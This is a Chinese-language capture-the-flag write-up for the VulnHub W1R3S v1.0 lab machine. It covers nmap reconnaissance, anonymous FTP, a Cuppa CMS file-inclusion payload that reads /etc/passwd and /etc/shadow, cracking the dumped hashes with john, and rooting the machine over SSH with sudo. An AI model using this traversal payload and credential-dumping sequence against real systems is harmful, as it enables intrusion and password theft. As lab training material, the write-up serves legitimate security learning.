Bootstrap

w1r3s.v1.0 打靶记录

https://www.vulnhub.com/entry/w1r3s-101,220/

思路:红队笔记

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    因为靶机是我最后添加的,所以靶机IP是133

    nmap -sP 192.168.75.0/24
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-20 09:09 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00022s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00015s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.133
    Host is up (0.00021s latency).
    MAC Address: 00:0C:29:11:5B:7D (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00028s latency).
    MAC Address: 00:50:56:F8:B3:1A (VMware)
    Nmap scan report for 192.168.75.131
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 2.14 seconds
    
  2. 扫描主机开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.133
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-20 09:11 CST
    Nmap scan report for 192.168.75.133
    Host is up (0.0011s latency).
    Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql
    MAC Address: 00:0C:29:11:5B:7D (VMware)
    

    开放了 21,22,80,3306

  3. 扫描主机服务版本以及系统版本

    nmap -sV -sT -O -p21,22,80,3306 192.168.75.133
    //
    PORT     STATE SERVICE VERSION
    21/tcp   open  ftp     vsftpd 2.0.8 or later
    22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
    3306/tcp open  mysql   MySQL (unauthorized)
    MAC Address: 00:0C:29:11:5B:7D (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    

    vsftpd 可能可以使用匿名登陆,可能会有信息泄露,所以优先级高

    Apache版本是2.4.18

    MySql未经授权,所以未能获取到版本信息

    操作系统版本**Linux 3.10 - 4.11** 或 Linux 3.2 - 4.9

    主机名为 W1R3S.inc

  4. UDP扫描

    nmap -sU 192.168.75.133
    //
    无数据
    
  5. 扫描开放端口漏洞

    我如果不设置--script-timeout 30s 会一直卡在98.xx%

    nmap -script=vuln -p21,22,80,3306 --script-timeout 30s  192.168.75.133
    //
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    80/tcp   open  http
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |_  /wordpress/wp-login.php: Wordpress login page.
    3306/tcp open  mysql
    MAC Address: 00:0C:29:11:5B:7D (VMware)
    

    没有找到什么漏洞,可能是扫描时间过短的原因,这样子的话我们的优先级就是21→80→3306→22 ,因为ftp可能造成文件泄露。web发现了wordpress的登陆页面,也有机会获得进度

FTP渗透

  1. 尝试下ftp是否能进行匿名登陆

    ftp 192.168.75.133
    //
    Connected to 192.168.75.133.
    220 Welcome to W1R3S.inc FTP service.
    Name (192.168.75.133:root): anonymous
    331 Please specify the password.
    Password: 
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    

    230 Login successful 登陆成功,接着查找信息

  2. 把匿名用户能获取的所有文件下载下来,一共有五个文件

    01.txt 02.txt 03.txt employee-names.txt worktodo.txt

    查看内容

    cat *.txt      
    New FTP Server For W1R3S.inc
    #
    #
    #
    #
    01ec2d8fc11c493b25029fb1f47f39ce
    #
    #
    #
    #
    #
    SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
    ############################################
    ___________.__              __      __  ______________________   _________    .__               
    \__    ___/|  |__   ____   /  \    /  \/_   \______   \_____  \ /   _____/    |__| ____   ____  
      |    |   |  |  \_/ __ \  \   \/\/   / |   ||       _/ _(__  < \_____  \     |  |/    \_/ ___\ 
      |    |   |   Y  \  ___/   \        /  |   ||    |   \/       \/        \    |  |   |  \  \___ 
      |____|   |___|  /\___  >   \__/\  /   |___||____|_  /______  /_______  / /\ |__|___|  /\___  >
                    \/     \/         \/                \/       \/        \/  \/         \/     \/ 
    The W1R3S.inc employee list
    
    Naomi.W - Manager
    Hector.A - IT Dept
    Joseph.G - Web Design
    Albert.O - Web Design
    Gina.L - Inventory
    Rico.D - Human Resources
    
            ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡
    
    ....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
                                                                      
    
    • New FTP Server For W1R3S.inc 指的应该是 新的W1R3S.inc 公司的ftp服务器 ,新的就表示可能存在漏洞

    • 01ec2d8fc11c493b25029fb1f47f39ce看着特征像是MD5,识别出来是:This is not a password

    • SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg== 看着像是base64,识别出来是:It is easy, but not that easy..

    • 中间的Ascii艺术说的是The W1R3S.inc

    • 还有个职员表,不过只有姓名,在爆破时可能用的上

      Naomi.W - Manager Hector.A - IT Dept Joseph.G - Web Design Albert.O - Web Design Gina.L - Inventory Rico.D - Human Resources
      
    • 最后有两行翻转过来的字符串,大概是

      we have a lot of work to do, stop playtng around'.
      i don't think this is the way to root!
      
  3. 好像没用…

WEB渗透

  1. 访问 http://192.168.75.133/ ,页面是apache的默认页面,可能是刚安装完

  2. 爆破目录都有啥,我们知道的只有wordpress的登录页

     python .\dirsearch.py -u http://192.168.75.133/
     //
     [10:14:57] Starting:
    [10:14:58] 403 -  300B  - /.ht_wsr.txt
    [10:14:58] 403 -  303B  - /.htaccess.bak1
    [10:14:58] 403 -  303B  - /.htaccess.orig
    [10:14:58] 403 -  305B  - /.htaccess.sample
    [10:14:58] 403 -  303B  - /.htaccess.save
    [10:14:58] 403 -  303B  - /.htaccess_orig
    [10:14:58] 403 -  304B  - /.htaccess_extra
    [10:14:58] 403 -  301B  - /.htaccess_sc
    [10:14:58] 403 -  301B  - /.htaccessOLD
    [10:14:58] 403 -  302B  - /.htaccessOLD2
    [10:14:58] 403 -  294B  - /.html
    [10:14:58] 403 -  293B  - /.htm
    [10:14:58] 403 -  303B  - /.htpasswd_test
    [10:14:58] 403 -  299B  - /.htpasswds
    [10:14:58] 403 -  300B  - /.httr-oauth
    [10:14:58] 403 -  293B  - /.php
    [10:14:58] 403 -  294B  - /.php3
    [10:15:00] 403 -  301B  - /.htaccessBAK
    [10:15:03] 301 -  324B  - /administrator  ->  http://192.168.75.133/administrator/
    [10:15:03] 302 -    7KB - /administrator/  ->  installation/
    [10:15:03] 302 -    7KB - /administrator/index.php  ->  installation/
    [10:15:10] 301 -  321B  - /javascript  ->  http://192.168.75.133/javascript/
    [10:15:16] 403 -  302B  - /server-status
    [10:15:16] 403 -  303B  - /server-status/
    [10:15:21] 301 -    0B  - /wordpress/  ->  http://localhost/wordpress/
    [10:15:21] 200 -    1KB - /wordpress/wp-login.php
    

    存在administrator文件夹和wordpress ,先去查看wordpress

  3. 来到wordpress登陆页面,输入之前的用户名,密码随便输,抓包尝试爆破,但是发现数据包host指向的是localhost ,也就是指向我们的127.0.0.1

    //数据包
    POST /wordpress/wp-login.php HTTP/1.1
    Host: localhost
    ....
    log=Naomi&pwd=123&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1
    

    应该是还没配置好,我们去administrator目录看看

  4. 跳转到访问administator目录跳转到/administrator/installation/ 是个CMS安装页面,也、页面的title显示的是Cuppa CMS ,经查阅是一个内容管理系统的项目

    在这里插入图片描述

    我们尝试next ,毕竟只有这一个交互,Database NamePasswordEmail都是空的

    在这里插入图片描述

    尝试输入Database Name = test,Password = test ,Email = [email protected] ,点击next

    在这里插入图片描述

    数据表创建成功,不过管理员用户创建失败,并且交互只有一个back ,这块也走不下去了

  5. 想到Cuppa也是一个开源项目,我们去查阅一下有没有漏洞,因为我们不知道CMS版本,所以都可以尝试下

    • 经查阅法cuppa存在文件包含漏洞,并且很容易利用

      https://bugtoolz.com/post/cs132020723/

      /target/templates/default/html/windows/right.php 下存在一个$_POST['url'] ,提交可以访问任意文件

    • 访问并抓包/administrator/templates/default/html/windows/right.php 因为是在administator目录安装的

    • 抓到包后测试读取/etc/passwd ,记得修改包请求方法,默认访问时GET需要改成POST

      //req
      POST /administrator/templates/default/html/windows/right.php HTTP/1.1
      Host: 192.168.75.133
      ....
      url=../../	../../etc/passwd
      

      读取成功

      //res
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
      bin:x:2:2:bin:/bin:/usr/sbin/nologin
      sys:x:3:3:sys:/dev:/usr/sbin/nologin
      sync:x:4:65534:sync:/bin:/bin/sync
      games:x:5:60:games:/usr/games:/usr/sbin/nologin
      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
      irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
      systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
      systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
      systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
      systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
      syslog:x:104:108::/home/syslog:/bin/false
      _apt:x:105:65534::/nonexistent:/bin/false
      messagebus:x:106:110::/var/run/dbus:/bin/false
      uuidd:x:107:111::/run/uuidd:/bin/false
      lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
      whoopsie:x:109:117::/nonexistent:/bin/false
      avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
      avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
      dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
      colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
      speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
      hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
      kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
      pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
      rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
      saned:x:119:127::/var/lib/saned:/bin/false
      usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
      w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
      sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
      ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
      mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
      
    • 能读取passwd我们就继续读取shadow文件

      root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
      daemon:*:17379:0:99999:7:::
      bin:*:17379:0:99999:7:::
      sys:*:17379:0:99999:7:::
      sync:*:17379:0:99999:7:::
      games:*:17379:0:99999:7:::
      man:*:17379:0:99999:7:::
      lp:*:17379:0:99999:7:::
      mail:*:17379:0:99999:7:::
      news:*:17379:0:99999:7:::
      uucp:*:17379:0:99999:7:::
      proxy:*:17379:0:99999:7:::
      www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
      backup:*:17379:0:99999:7:::
      list:*:17379:0:99999:7:::
      irc:*:17379:0:99999:7:::
      gnats:*:17379:0:99999:7:::
      nobody:*:17379:0:99999:7:::
      systemd-timesync:*:17379:0:99999:7:::
      systemd-network:*:17379:0:99999:7:::
      systemd-resolve:*:17379:0:99999:7:::
      systemd-bus-proxy:*:17379:0:99999:7:::
      syslog:*:17379:0:99999:7:::
      _apt:*:17379:0:99999:7:::
      messagebus:*:17379:0:99999:7:::
      uuidd:*:17379:0:99999:7:::
      lightdm:*:17379:0:99999:7:::
      whoopsie:*:17379:0:99999:7:::
      avahi-autoipd:*:17379:0:99999:7:::
      avahi:*:17379:0:99999:7:::
      dnsmasq:*:17379:0:99999:7:::
      colord:*:17379:0:99999:7:::
      speech-dispatcher:!:17379:0:99999:7:::
      hplip:*:17379:0:99999:7:::
      kernoops:*:17379:0:99999:7:::
      pulse:*:17379:0:99999:7:::
      rtkit:*:17379:0:99999:7:::
      saned:*:17379:0:99999:7:::
      usbmux:*:17379:0:99999:7:::
      w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
      sshd:*:17554:0:99999:7:::
      ftp:*:17554:0:99999:7:::
      mysql:!:17554:0:99999:7:::
      
  6. rootwww-dataw1r3s用户进行破解

    • 将内容保存为shadow.hash 传入到kali

      root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
      www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
      w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
      
    • 使用john破解

      john shadow.hash 
      //
      reated directory: /root/.john
      Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
      Use the "--format=HMAC-SHA256" option to force loading these as that type instead
      Using default input encoding: UTF-8
      Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
      Cost 1 (iteration count) is 5000 for all loaded hashes
      Will run 8 OpenMP threads
      Proceeding with single, rules:Single
      Press 'q' or Ctrl-C to abort, almost any other key for status
      www-data         (www-data)     
      Almost done: Processing the remaining buffered candidate passwords, if any.
      Proceeding with wordlist:/usr/share/john/password.lst
      computer         (w1r3s)     
      Proceeding with incremental:ASCII
      

      暂时破解出来了两个用户的密码,除了root的,权限看着应该是w1r3s的更高

  7. 使用ssh登录w1r3s 用户,并查看其权限

    • 登陆成功

      ssh w1r3s@192.168.75.133 
      //
      ----------------------
      Think this is the way?
      ----------------------
      Well,........possibly.
      ----------------------
      w1r3s@192.168.75.133's password: 
      Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
      
       * Documentation:  https://help.ubuntu.com
       * Management:     https://landscape.canonical.com
       * Support:        https://ubuntu.com/advantage
      
      108 packages can be updated.
      6 updates are security updates.
      
      .....You made it huh?....
      Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
      w1r3s@W1R3S:~$ 
      
    • 查看权限

      w1r3s@W1R3S:~$ whoami
      w1r3s
      //
      w1r3s@W1R3S:~$ uname -a
      Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
      //
      w1r3s@W1R3S:~$ ip a
      1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
          link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
          inet 127.0.0.1/8 scope host lo
             valid_lft forever preferred_lft forever
          inet6 ::1/128 scope host 
             valid_lft forever preferred_lft forever
      2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
          link/ether 00:0c:29:11:5b:7d brd ff:ff:ff:ff:ff:ff
          inet 192.168.75.133/24 brd 192.168.75.255 scope global dynamic ens33
             valid_lft 1134sec preferred_lft 1134sec
          inet6 fe80::aae5:6c48:85ba:de8/64 scope link 
             valid_lft forever preferred_lft forever
      // 直接进去root用户了
      w1r3s@W1R3S:~$ sudo -i
      root@W1R3S:
      //
      root@W1R3S:~# whoami
      root
      

      提权成功

  8. 读取flag.txt文件,登录root后就在当前目录下

    
    // flag.txt
    -----------------------------------------------------------------------------------------
       ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
      / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
     | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
     | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
      \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 
                                                                                            
    -----------------------------------------------------------------------------------------
    
                              .-----------------TTTT_-----_______
                            /''''''''''(______O] ----------____  \______/]_
         __...---'"""\_ --''   Q                               ___________@
     |'''                   ._   _______________=---------"""""""
     |                ..--''|   l L |_l   |
     |          ..--''      .  /-___j '   '
     |    ..--''           /  ,       '   '
     |--''                /           `    \
                          L__'         \    -
                                        -    '-.
                                         '.    /
                                           '-./
    
    ----------------------------------------------------------------------------------------
      YOU HAVE COMPLETED THE
                   __      __  ______________________   _________
                  /  \    /  \/_   \______   \_____  \ /   _____/
                  \   \/\/   / |   ||       _/ _(__  < \_____  \ 
                   \        /  |   ||    |   \/       \/        \
                    \__/\  /   |___||____|_  /______  /_______  /.INC
                         \/                \/       \/        \/        CHALLENGE, V 1.0
    ----------------------------------------------------------------------------------------
    
    CREATED BY SpecterWires
    
    ----------------------------------------------------------------------------------------
    
    
;